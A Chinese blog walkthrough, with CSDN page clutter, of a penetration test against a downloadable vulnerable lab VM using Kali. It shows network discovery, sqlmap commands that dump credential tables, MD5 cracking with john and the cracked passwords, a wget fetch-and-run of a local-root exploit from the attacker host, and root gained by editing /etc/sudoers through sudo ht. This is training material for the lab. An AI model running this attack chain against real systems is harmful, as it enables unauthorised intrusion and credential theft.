kali对未知web server透测试4

最新推荐文章于 2023-05-13 23:58:06 发布
最新推荐文章于 2023-05-13 23:58:06 发布
阅读量1w 收藏 1
点赞数 2
分类专栏: kali web 渗透 文章标签: php mysql kali linux 安全 ubuntu
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_39583774/article/details/119323266
版权

环境

主机ip
kaliLinux192.168.101.62(桥接)
靶机-4未知

靶机

https://pan.baidu.com/s/1OdlzNEPNMPw0JHDzyyMBEA
提取码:1234

打开靶机

在这里插入图片描述

渗透测试

主机探测
netdiscover -i eth1 -r 192.168.101.0/24

在这里插入图片描述
可以看到靶机地址为192.168.101.75

收集信息

在这里插入图片描述
使用dirb目录爆破
在这里插入图片描述
漏洞扫描

nikto -host http://192.168.101.75

在这里插入图片描述
在这里插入图片描述

访问web界面

在这里插入图片描述
在这里插入图片描述
这里可以看到phpadmin版本
尝试弱密码登录
尝试发现

admin+空密码登录
‘localhost’@'@” +空密码

在这里插入图片描述
判断数据库是否有写权限

show variables like '%secure%';

在这里插入图片描述

secure_file_priv #为空没有写入权限

在这里插入图片描述

show variables like '%datadir%'; #获取数据库路径

在这里插入图片描述
这里用了好几种注入方式,都失败了,这里不再列举。

第二天这里ip发送了一点变化192.168.101.76

查看phpmyadmin日志发现注入点
使用sql注入方式

http://192.168.101.76/gallery/gallery.php?id=1
在这里插入图片描述
我们使用sqlmap 查找数据库

sqlmap -u http://192.168.101.76/gallery/gallery.php?id=1 --dbs --batch

在这里插入图片描述
查看gallery里的表

sqlmap -u http://192.168.101.76/gallery/gallery.php?id=1 -D gallery --tables --batch

在这里插入图片描述
查看dev_accounts内字段

sqlmap -u http://192.168.101.76/gallery/gallery.php?id=1 -D gallery -T dev_accounts --columns --batch

在这里插入图片描述

查找字段值

sqlmap -u http://192.168.101.76/gallery/gallery.php?id=1 -D gallery -T dev_accounts -C username,password --dump --batch

在这里插入图片描述
这里sqlmap已经把md5值找到了,如果没有就看下面步骤

vim md5.txt
cat md5.txt   
dreg:0d3eccfb887aabd50f243b3f155c0f85
loneferret:5badcaf789d3d1d09794d8f021f40f0e
john --format=raw-MD5 md5.txt也可以直接在网上找

在这里插入图片描述
上面查找数据库可以看到还有个users表
查找gallarific_users表字段

sqlmap -u http://192.168.101.76/gallery/gallery.php?id=1 -D gallery -T gallarific_users --columns --batch

在这里插入图片描述

查询字段值 username,password

sqlmap -u http://192.168.101.76/gallery/gallery.php?id=1 -D gallery -T gallarific_users -C username,password --dump --batch

在这里插入图片描述
因为nmap探测到22端口ssh是开放的可以直接进行登录

ssh dreg@192.168.101.76
输入密码Mast3r

在这里插入图片描述
这里权限不够
在这里插入图片描述
提权
在这里插入图片描述
在这里插入图片描述
下载提权脚本到kali中开启httpd提供下载

在这里插入图片描述

wget http://192.168.101.62/5093.c
gcc 5093.c
./a.out
提权失败了

在这里插入图片描述
换用户登录继续提权

ssh loneferret@192.168.101.76
starwars
export TERM=xterm-color

在这里插入图片描述

sudo ht
按f3输入/etc/sudoers 
回车后
修改loneferret 在末尾加上 ,/bin/bash
F10保存

在这里插入图片描述
在这里插入图片描述

sudo /bin/bash
id
uid=0(root) gid=0(root) groups=0(root)

在这里插入图片描述

0x717866
关注
  • 2
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
kali安装openssh-server支持远程ssh登陆
05-05 1957
1.打开kali终端,输入 sudo apt-get install openssh-server -y 然后回车进行ssh服务安装 2.启用PermitRootLogin 启用X11转发 X11Forwrding yes 3.启动ssh服务 4. telnet 127.0.0.1 22 测试服务连接 5. 开机运行服务 6. windows下PuTTY客户端口连接 7. 通过用户名与密码登陆 8. 成功登陆kali终端 9.下...
2022年江西省中职组“网络空间安全”赛项模块B-Web测试
Aluxian_的博客
01-15 3923
2022年中职组山西省“网络空间安全”赛项B-8:Web测试任务书B-8:Web测试解析不懂可以私信博主! 一、竞赛时间 420分钟 共计7小时 吃饭一小时 二、竞赛阶段 竞赛阶段 任务阶段 竞赛任务 竞赛时间 分值 第①阶段: 单兵模式系统渗测试 任务一: 系统漏洞利用与提权 任务二: Linux操作系统渗测试 任务三: 应用服务漏洞扫描与利用 任务四: SQL注入测试(PL) 任务五: 应急响应 任务六: 流量分析 任务七: 渗测试 任务八: Web测试 任务九:Windows操作系统
kali未知web server测试2
热门推荐
信安是不可或缺的一部分!
07-23 4万+
环境介绍 主机 IP(NAT) kali 192.168.252.128 靶机2 未知 靶机下载:https://pan.baidu.com/s/1u5xbmU13wheXE4_M508qFw 提取码:1234 打开靶机 主机探测 NAT网卡位于192.168.252.0/24网段 进行主机探测 netdiscover -i eth0 -r 192.168.252.0/24 信息收集 访问web界面 没有发现可疑渗点,这里使用目录爆破,看一下有没有隐藏界面。 d
Kali学习(1)——WEB端域名探测与端口扫描于sqlmap注入
weixin_43669969的博客
02-19 1639
Kali学习(1)——WEB端域名探测与端口扫描 前言 学习Kali已经将近半个月了,有必要记录以下自己的学习过程,以免遗忘 1.子域名探测 DNS服务是暴露信息的主要来源,一般安全性高的大型互联网址不容易发现漏洞,所以我们可以从子域名(比如三级域名)下手,而dnsenum是一款强大的域名信息收集工具,使用格式 dnsenum -f (-f指定收集用的字典文件)/usr/share/dn...
web测试(sqlmap)
m0_58713554的博客
12-24 3332
通过分析靶机JLS02页面信息,寻找漏洞页面,将WEB服务存在SQL注入漏洞的页面名称作为Flag提交 Flag:index2.php 通过本地PC中的渗测试平台KALI2020对靶机进行SQL注入攻击,获取靶机的数据库信息,将用来存放WEB服务的数据库名称作为FLAG提交 先随便输入点什么 sqlmap这个地址 sqlmap 使用注入语句结果如下 flag:webiu 3. 通过本地PC中的渗测试平台KALI2020对靶机进行SQL注入攻击,获取靶机的数据库信息,将用...
如何利用Kali Linux进行网站渗测试:最常用工具详解
最新发布
weixin_43263566的博客
05-13 7068
Kali Linux 2022.4虚拟机中常用的渗测试工具介绍
Kali进行web笔记(六)
小勇的博客
06-12 1703
Scanning-dirbCGI is a common standard for web applications to interact with command-line executables;hence,CGI scripts were the most vulnerable to shellshock attack. Exploitation:use*apache_mod_cgi_bas
Kali进行web笔记(五)
小勇的博客
06-12 1144
Attacking the Server Using Injectinog-based Flaws components likely to attack Components Injection flaws Operation system shell Command injection Relational database(RDBMS) SQL injection W
网络安全kali web安全 Kali之msf简单的漏洞利用
xueshenlaila的博客
03-08 1万+
信息收集 靶机的IP地址为:192.168.173.136 利用nmap工具扫描其开放端口、系统等 整理一下目标系统的相关信息 系统版本:Windows server 2003 开放的端口及服务: 21/tcp ftp 135/tcp msrpc 139/tcp netbios-ssn 445/tcp microsoft-ds 777/tcp multiling-http 1025/tcp NFS-or-IIS 1026/tcp LSA-or-nterm 1029/tcp ms
web安全攻防渗测试实训笔记
m0_65385236的博客
04-07 1367
1. Nmap的基本 Nmap + ip 6+ ip Nmap -A 开启操作系统识别和版本识别功能 – T(0-6档) 设置扫描的速度 一般设置T4 过快容易被发现 -v 显示信息的级别,-vv显示更详细的信息 192.168.1.1/24 扫描C段 192.168.11 -254 =上 nmap -A -T4 -v -iL ~/targets.txt (iL表示要扫描的目标位于一个文档中) --------------- 192.168.1.1/24 ...
web安全测试介绍与实际操作典例分析
HBohan的博客
06-23 1727
测试的意义 渗测试是站在第三者的角度来思考企业系统的安全性的,通过渗测试可以发觉企业潜在却未纰漏的安全性问题。企业可以根据测试的结果对内部系统中的不足以及安全脆弱点进行加固以及改善,从而使企业系统变得更加安全,减低企业的风险。 渗测试的分类 渗测试按照渗的方法与视角可以分为以下三类: 黑盒测试 黑盒测试(Black-box Testing)也称为外部测试(External Testing)。采用这种方式时,渗测试团队将从一个远程网络位置来评估目标网络基础设施,并没有任何目标网络内部拓扑等相关
江西省省赛中职网络安全-Web测试
weixin_48800344的博客
01-05 693
2021年职业院校技能大赛“网络安全”项目 江西省比赛任务书 一、竞赛时间 总计:420分钟 二、竞赛阶段 竞赛阶段 任务阶段 竞赛任务 竞赛时间 分值 A模块 A-1 登录安全加固 180分钟 200分 A-2 Web安全加固(Web) A-3 流量完整性保护与事件监控(Web,Log) A-4 防火墙策略 A-5 Windows操作系统安全配置 A-6 Linux操作系统安全配置 B模块 B-1 系统漏洞利用与提权 400分 B-2 Linux操作系统渗测试 B-3 应用服务漏洞扫描与利用 B-4 S
遇到了http响应头中的Server字段为空的“灵异事件“
技术的学习与积累是个技术活
08-10 1529
前言 祖传代码坑多是众所周知的事!这不,前段时间就遇到了一个坑,即手撸的httpclient模块遇到响应报名,响应头中的字段值为空时就出现“解析”报名异常,导致没有响应的回调到上层业务!这个httpclient是用c++来写的,用tcp创建连接后发http请求与处理http server的响应。出现该异常时收到的响应报名中Server的值竟然是空值!跟服务器维护同学排查不是自己的web server配置问题后,基本只能是怀疑用户网络连路的某个网关或网络代理搞的鬼—偷偷的追加了Server但该值为空。 响应头
kali-信息收集】(1.3)探测网络范围:DMitry(域名查询工具)、Scapy(跟踪路由工具)
08-01 1994
kali-信息收集】探测网络范围
Kali工具之-web网站路径扫描
KingXai的专栏
10-24 2万+
介绍: 通过探测服务器的响应(2xx,3xx,4xx,5xx),来分析web网站的敏感目录; 下载: git clone --depth=1 https://github.com/deibit/cansina; 特点: 多线程SSL支持代理支持数据持久性与sqlite数据库基本认证饼干罐恢复路径递归持久连接互补工具 参数: -u url地址
kali 主动信息收集之主机发现
qq_45070118的博客
06-23 1819
主动信息收集,简单地说,就是直接和目标主机进行通信,进而来查看相应的信息。其缺点是很明显的,就是它容易被发现,主动发起的直接请求会被目标主机记录下来,即会留下访问的痕迹,最好使用受控的第三方主机进行探测,如使用代理或者是已经被控制的主机。 分为二层发现三层发现四层发现 二层发现 arping arping命令是用于发送arp请求到一个相邻主机的工具,arping使用arp数据包,通过ping命令检...
KaliWeb-扫描工具-Burpsuite
追风筝的孩子
08-04 1万+
        在学习Burpsuit之前,我先说一下什么是代理,就是代理网络用户去取得网络信息,作为一个在浏览器和目标应用程序之间的中间人,允许你拦截,查看,修改在两个方向上的原始数据流。形象地说:它是网络信息的中转站。一般情况下,我们使用浏览器直接去连接其他internet 站点取得网络信息时,必须送出请求信号来得到回答,然后对方再把信息以字节方式传送回来。代理服务器是介于浏览器和web 服务...
测试获取webshell方法总结
u013930899的博客
10-06 3364
本文总结了渗测试php网站获取webshell的几种方法
在云服务器上搭建Kali系统-最新kali2021.3版本+避坑指南
G3et的博客
10-10 9949
前言:由于各种原因,需要在服务器上部署一台kali,最初的想法是在服务器搭建一台虚拟机运行,结果后面才发现服务器已经是虚拟的了,不能再开虚拟了,所以云服务器搭建虚拟机运行失败!然后在网上借鉴了网友的办法成功在服务器上搭建好kali系统。但是!但是!网上的办法只有仅仅一两个,且并不是最完善的办法,本人踩了几个坑,一一为大家分享出来,如果想节约时间不想搭建镜像的,可以找我要! 实现思路:由于云主机官方没有提供kali的镜像,我们可以用虚拟机硬盘文件自制镜像------->然后上传------>重装
Kali Linux Web测试实战指南
Kali Linux Web...《Kali Linux Web测试秘籍中文版》是一本实用的工具书,适合网络安全专业人员和对Web测试感兴趣的读者,它详细解释了如何在Kali Linux平台上进行专业级的Web安全评估和防御策略学习。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

0x717866

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值